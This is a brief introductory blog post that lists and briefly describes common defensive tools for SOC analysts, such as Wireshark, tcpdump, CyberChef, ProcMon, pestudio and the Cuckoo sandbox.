Essential tools for SOC Analysts

3 min readMay 2, 2022

The tools mentioned here are actually known tools for their own purposes. Many are found in SOC analysts’ toolkits. This content does not provide information about the use and detailed features of the tools. Hoping it will be useful for those who want to make a start in the field of SOC analytics.

Wireshark(tshark)

It is a popular tool for monitoring or sniffing a network. It is a tool often used to discover vulnerabilities and what is going on in the network during analysis. Tshark, on the other hand, is a command line tool that allows terminal-based use of wireshark. You can click the link here to get Wireshark and the link here for tshark.

tcpdump

tcpdump is a command line tool. It allows you to listen to TCP/IP or other packets of the network you are connected to. Tcpdump is a tool specific to Linux in general. You can visit the link for installation and detailed information.

CyberChef

A useful tool for SOC analysts working on CyberChef web application. CyberChef converts data formats such as Hex, Base64, Binary etc observed by the attacker. In addition to the specified features, ChefChef has many more abilities. It can be used from the address in the link. Link for detailed information.

Process Monitor(ProcMon)

ProcMon is a Windows-specific tool. It is a tool that simplifies the analysis by allowing the registry and process/thread activity to be displayed instantly on Windows systems. Download link.

Process Hacker

Process Hacker is a tool similar to ProcMon. Processes about the device it is connected to can be used to view the performance information of the system. Useful for monitoring malware. It can be downloaded from the link.

PEiD

PEiD is a tool used for PE Files analysis. It is often preferred for signature detections. It can be downloaded from the link.

ProcDOT

It is a useful tool for detecting malware. It can turn a malicious file’s network and system activities into a diagram. It can be downloaded for Linux and Windows distributions from the link.

pestudio

pestudio is often used, especially to detect malware. About the detected malicious file indicators, libraries, strings, virustotal result etc. provides important information such as. It can be downloaded from the link.

Cuckoo

Cuckoo is the sandbox solution for analyzing malware. It makes results easy for you by providing an isolated structure for the malware you want to analyze. It can be downloaded from the link.

You can listen to the song of this article here. Thanks for taking the time to care.